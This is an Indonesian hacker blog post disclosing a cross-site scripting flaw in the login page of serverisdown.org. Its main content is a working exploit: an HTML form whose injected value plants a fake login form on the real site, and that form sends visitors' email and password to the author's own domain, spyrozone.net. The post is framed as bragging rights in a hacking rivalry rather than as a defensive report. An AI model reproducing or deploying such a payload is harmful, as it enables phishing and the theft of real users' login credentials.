Serverisdown.org Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Tuesday, December 23rd, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Serverisdown.org merupakan situs yang belakangan ini jadi perhatian karena aksi-aksi serangannya ke Malaysia. Kedua belah pihak sama-sama saling menghancurkan. Akhirnya yang jadi korban dan menderita ya si pemilik situs yang diserang, hehehe.. :D

Ada kelemahan menarik di website serverisdown.org. Saya posting duluan sebelum penyerang dari negara tetangga berbangga hati dan mengklaim kelemahan ini sebagai temuannya ^^

Vulnerable Area

Kelemahan ada pada penanganan error halaman login yang tidak disanitasi dengan baik.

{image: Halaman Login Serverisdown.org}

Halaman Login Serverisdown.org

Exploit

//Fake Login

<form target="serverisdown" action="http://serverisdown.org/blog/index.php?action=777" method=post name=editor>
<input type=hidden name=email style="width:150px;" value="&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&quot;&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;form action=&quot;http://spyrozone.net&quot; method=post name=whatevah&gt;&lt;td&gt;Your email (Confirm)&lt;/td&gt;&lt;td&gt;&lt;input type=text name=email width=150px&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Your password&lt;/td&gt;&lt;td&gt;&lt;input type=password name=password width=150px&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt&lt;input type=submit value=Ok&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;Fake Login Example | XSSED by SPYRO KiD | http://spyrozone.net&lt;style&gt;&lt;noscript&gt;">
<input type=hidden name=remember value=1>
<a href="#" onClick="editor.submit();">Click Me</a>
</form>

Screenshot:

{image: Fake Login serverisdown.org}

Fake Login serverisdown.org

Jika seseorang memasukkan informasi login melalui form yang telah diinjeksi tersebut, maka informasi yang dimasukkan akan terkirim ke Phisher.

//E.O.F


//E.O.F